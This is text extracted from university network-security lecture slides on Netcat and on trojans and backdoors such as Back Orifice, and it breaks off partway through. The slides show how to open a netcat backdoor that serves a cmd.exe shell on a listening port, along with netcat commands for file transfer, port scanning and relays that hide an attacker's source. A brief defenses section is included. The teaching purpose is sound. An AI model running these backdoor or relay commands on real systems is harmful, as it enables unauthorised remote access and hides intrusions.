Backdoors and TrojansAgenda OverviewAgenda NetcatNetcat – TCP/IP Swiss Army KnifeNetcatNetcat – Major FeaturesNetcat – Major Features (contd)Netcat (called ‘nc’)Netcat – Client modeNetcat - listen modeNetcat - ConfigurationNetcat - InstallationNetcat – Possible usesNetcat – File transferNetcat – Scan portsNetcat – Create backdoorsNetcat – Create relaysNetcat DefensesSummary NetcatAgenda Trojans/BackdoorsMalicious Remote Access ToolsBack OrificeBack Orifice (cont.)NetBusSlide 25Slide 26Slide 27Sub7Sub7Slide 30Slide 31Slide 32Sub7 Screenshot #1Sub7 Screenshot #2Sub7 Screenshot #3Sub7 Screenshot #4How attackers find an infected PCDefense against Trojans/BackdoorsVirtual Network ConnectionsSlide 40Summary1Backdoors and TrojansECE 4112 - Internetwork Security2Agenda Overview•Netcat•Trojans/BackdoorsECE 4112 - Internetwork Security3Agenda Netcat•NetcatOverviewMajor FeaturesInstallation and ConfigurationPossible Uses•Netcat Defenses•SummaryECE 4112 - Internetwork Security4Netcat – TCP/IP Swiss Army Knife•Reads and Writes data across the network using TCP/UDP connections•Feature-rich network debugging and exploration tool •Part of the Red Hat Power Tools collection and comes standard on SuSE Linux, Debian Linux, NetBSD and OpenBSD distributions. •UNIX and Windows versions available at:http://www.atstake.com/research/tools/network_utilities/ECE 4112 - Internetwork Security5Netcat•Designed to be a reliable “back-end” tool – to be used directly or easily driven by other programs/scripts•Very powerful in combination with scripting languages (eg. Perl)“If you were on a desert island, Netcat would be your tool of choice!” - Ed SkoudisECE 4112 - Internetwork Security6Netcat – Major Features•Outbound or inbound connections•TCP or UDP, to or from any ports •Full DNS forward/reverse checking, with appropriate warnings •Ability to use any local source port •Ability to use any locally-configured network source address•Built-in port-scanning capabilities, with randomizerECE 4112 - Internetwork Security7Netcat – Major Features (contd)•Built-in loose source-routing capability •Can read command line arguments from standard input •Slow-send mode, one line every N seconds •Hex dump of transmitted and received data •Optional ability to let another program service established connections •Optional telnet-options responderECE 4112 - Internetwork Security8Netcat (called ‘nc’)•Can run in client/server mode•Default mode – client•Same executable for both modes•client modenc [dest] [port_no_to_connect_to]•listen mode (-l option)nc –l –p [port_no_to_connect_to]ECE 4112 - Internetwork Security9Netcat – Client modeComputer with netcat in Client mode1. Input comes from a standard Input device2. Passes through netcat in client mode3. Output is sent across the network to any TCP/UDP port on any systemECE 4112 - Internetwork Security10Netcat - listen modeComputer with netcat in listen mode1. Input comes from the network on any TCP/UDP port2. Passes through netcat in listen mode3. Output appears on standard output deviceECE 4112 - Internetwork Security11Netcat - Configuration•LINUX installationtar xvfs netcat.tar.gzcd netcatmake linuxcp nc /usr/local/sbinNote: The last command will allow you to run netcatwithout having to specify the directoryECE 4112 - Internetwork Security12Netcat - Installation•Windows InstallationCopy file nc11nt.zip in a folderUnzip this file – creates a directory called nc11ntTo run netcat – go to the nc11nt folder and run it from thereECE 4112 - Internetwork Security13Netcat – Possible uses•Transfer files•Scan ports•Create backdoors•Create relays•Many more…ECE 4112 - Internetwork Security14Netcat – File transferScenario: Attacker wants to transfer a file to another machine, only one port open and that is not FTP port Windows – nc listener (IP: a.b.c.d)c:\ nc –l –p 1234 > testfile.txtLinux – nc client (IP: a.b.c.d)nc a.b.c.d 1234 < testfile.txtECE 4112 - Internetwork Security15Netcat – Scan portsGoal: To scan ports without using nmapSend H-E-L-L-O to each targetOn the client machineecho Hello | nc –v –w 3 –z a.b.c.d 1-200This will go to various TCP or UDP ports on the target machineECE 4112 - Internetwork Security16Netcat – Create backdoors•On Windows machine, create netcat backdoor listener that runs cmd.exe shellc:\ nc –l –p 7777 –e cmd.exe•Connect to this backdoor by running netcat in client mode on Linux machinenc a.b.c.d 7777•Can send commands like “cd” and “mkdir”ECE 4112 - Internetwork Security17Netcat – Create relaysCan be used to bounce connections between systems. Obscures attacker’s source1. Create a relay on the Linux machine2. Configure the relay to forward data to another port on the linux machine3. At the other port, set up a netcat backdoor shell4. Connect to the relay from the Windows machine using netcat in client modeECE 4112 - Internetwork Security18Netcat Defenses•For file transfer and port scanning – Close all unused ports•For backdoors Close unused portsCarefully audit system usage–Check applications running with root privileges–Close suspicious programs•For relays – Multiple layers of securityECE 4112 - Internetwork Security19Summary NetcatNetcatOverviewMajor FeaturesInstallation and ConfigurationPossible UsesNetcat DefensesNext – Trojans/BackdoorsECE 4112 - Internetwork Security20Agenda Trojans/Backdoors•Malicious Remote Access ToolsBackdoorsTrojans•Defenses against Trojans/Backdoors•Virtual Network Channels•SummaryECE 4112 - Internetwork Security21Malicious Remote Access Tools•BackdoorsAlso called as “trapdoor”An undocumented way of gaining access to a program, online service or an entire computer system. Allows to execute privileged operations on the affected machine•Trojan HorseDoes not replicate or copy itselfDamages or compromises the security of the computerIt relies on someone emailing it to you. It does not email itselfECE 4112 - Internetwork Security22Back Orifice•Authored by Cult of the Dead Cow •Released on 3rd Aug 1998•Allows remote manipulation ofFile systemRegistrySystemPasswordsNetworkProcessesECE 4112 - Internetwork Security23Back Orifice (cont.)•First widely used trojanComplete Implementation of services supported by the Windows 95/98 APISmall,